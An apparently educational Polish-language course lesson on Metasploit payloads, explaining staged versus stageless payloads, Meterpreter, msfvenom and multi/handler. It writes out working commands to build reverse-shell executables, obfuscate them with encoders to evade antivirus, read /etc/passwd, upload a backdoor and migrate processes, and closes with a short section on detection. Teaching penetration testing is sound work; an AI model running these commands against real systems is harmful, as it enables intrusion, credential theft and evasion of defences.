Cyber Security Academy · Lekcja

Payloady: staged, stageless i Meterpreter

Dobiorą Państwo odpowiedni payload do danego scenariusza i wykorzystają Meterpreter po uzyskaniu dostępu.

Lekcja 3 z 413 kroki

Payloady: staged, stageless i Meterpreter to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 3 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Czym jest payload?

Payload to kod uruchamiany na celu po pomyślnym wykorzystaniu podatności. Określa, co zyskuje atakujący: powłokę, możliwość wykonywania poleceń, dostęp do plików lub rozbudowanego agenta, takiego jak Meterpreter.

Payloady staged i stageless

Payloady stageless (/) zawierają wszystko w jednym pliku binarnym — są większe, ale prostsze, i po początkowym dostarczeniu nie wymagają zwrotnego połączenia sieciowego. Payloady staged (//) najpierw wysyłają niewielki stager, który pobiera drugi etap z handlera.

# Stageless (single slash naming):
windows/x64/shell_reverse_tcp

# Staged (double slash naming):
windows/x64/shell/reverse_tcp
#                 ^
#                 stage 2 downloaded after stager connects

Kiedy używać poszczególnych typów

Używaj payloadu stageless, gdy cel nie ma dostępu do Internetu ani handlera po początkowym wykorzystaniu podatności — payload musi być samowystarczalny. Używaj payloadu staged, gdy chcesz zmniejszyć początkowy payload i masz niezawodne połączenie z handlerem.

Przegląd Meterpreter

Meterpreter to zaawansowany payload Metasploit — działa w całości w pamięci, zapewnia szyfrowaną komunikację i udostępnia rozbudowane API obejmujące dostęp do systemu plików, migrację procesów, rejestrowanie naciśnięć klawiszy, wykonywanie zrzutów ekranu oraz pivoting.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > run

Polecenia Meterpreter

Najważniejsze polecenia Meterpreter używane po uzyskaniu dostępu obejmują informacje o systemie, listę procesów, operacje na plikach i funkcje sieciowe.

meterpreter > sysinfo          # system information
meterpreter > getuid           # current user
meterpreter > ps               # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell            # drop to OS shell

Migracja procesu

Przenieś proces Meterpreter do stabilniejszego lub mniej podejrzanego procesu (np. explorer.exe w systemie Windows). Może to również podwyższyć uprawnienia, jeśli proces zostanie przeniesiony do procesu działającego z wyższymi uprawnieniami.

meterpreter > ps
meterpreter > migrate 1234     # migrate to PID 1234

# Migrate to explorer.exe for stability
# Avoids termination if original process exits

Generowanie payloadów za pomocą msfvenom

msfvenom generuje samodzielne pliki payloadów (EXE, ELF, APK, shellcode) do dostarczania za pomocą phishingu, nośników USB lub powłok webowych w ramach autoryzowanych testów.

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f exe -o payload.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f elf -o payload.elf

Multi/Handler do przechwytywania powłok

Moduł auxiliary multi/handler przechwytuje połączenia zwrotnych powłok. Przed dostarczeniem payloadu skonfiguruj go z takim samym payloadem, LHOST i LPORT, jakich użyto w msfvenom.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j      # run as background job

Podstawy kodowania i omijania zabezpieczeń

Encodery msfvenom mogą zaciemniać payloady, aby omijać podstawowe wykrywanie przez programy AV oparte na sygnaturach. Uwaga: nowoczesne rozwiązania EDR stosują wykrywanie behawioralne — same encodery nie wystarczą przeciwko zaawansowanym mechanizmom obronnym.

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -e x64/xor_dynamic -i 5 \
  -f exe -o encoded_payload.exe

Payloady bind i reverse

Payloady reverse łączą się z celu do atakującego (lepsze rozwiązanie w przypadku NAT i zapór sieciowych). Payloady bind nasłuchują na celu — atakujący łączy się z nim. W większości scenariuszy preferowane są payloady reverse.

Wykrywanie payloadów przez obrońców

Obrońcy wykrywają Meterpreter za pomocą sygnatur sieciowych (wzorce ruchu C2), skanowania pamięci (artefakty refleksyjnego wstrzykiwania bibliotek DLL) oraz analizy behawioralnej (process hollowing, nietypowe relacje proces nadrzędny–proces podrzędny).

Szybki sprawdzian

Co odróżnia payload staged od payloadu stageless w Metasploit?

Podsumowanie: payloady i Meterpreter

Wybieraj payloady staged, gdy zależy Ci na małym początkowym rozmiarze, a stageless, gdy potrzebujesz samodzielnego dostarczania. Meterpreter to najbardziej rozbudowany payload do działań po uzyskaniu dostępu: działa w pamięci, zapewnia szyfrowanie i można go rozszerzać. Używaj msfvenom do generowania samodzielnych plików binarnych i zawsze konfiguruj multi/handler do przechwytywania połączeń zwrotnych.

Bezpłatny start

Ucz się Cyber Security Academy dzięki korepetycjom AI — za darmo

Pisz i uruchamiaj kod w przeglądarce, otrzymuj natychmiastową pomoc od korepetytora AI dostępnego 24/7 i kontynuuj naukę w sieci lub w aplikacji.

Kursy
76
Lekcje
303

Często zadawane pytania

Czy lekcja „Payloady: staged, stageless i Meterpreter” jest bezpłatna?

Tak — pełny tekst „Payloady: staged, stageless i Meterpreter” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Co nauczysz się w „Payloady: staged, stageless i Meterpreter”?

Dobiorą Państwo odpowiedni payload do danego scenariusza i wykorzystają Meterpreter po uzyskaniu dostępu. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.

Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?

Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 3 z 4.

Ile czasu zajmuje lekcja „Payloady: staged, stageless i Meterpreter”?

Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.

Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?

Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.

Wszystkie lekcje w tym kursie

  1. Architektura Metasploit i msfconsole
  2. Wykorzystanie znanej podatności
  3. Payloady: staged, stageless i Meterpreter
  4. Po uzyskaniu dostępu: pivoting i utrzymanie dostępu
← Powrót do Cyber Security Academy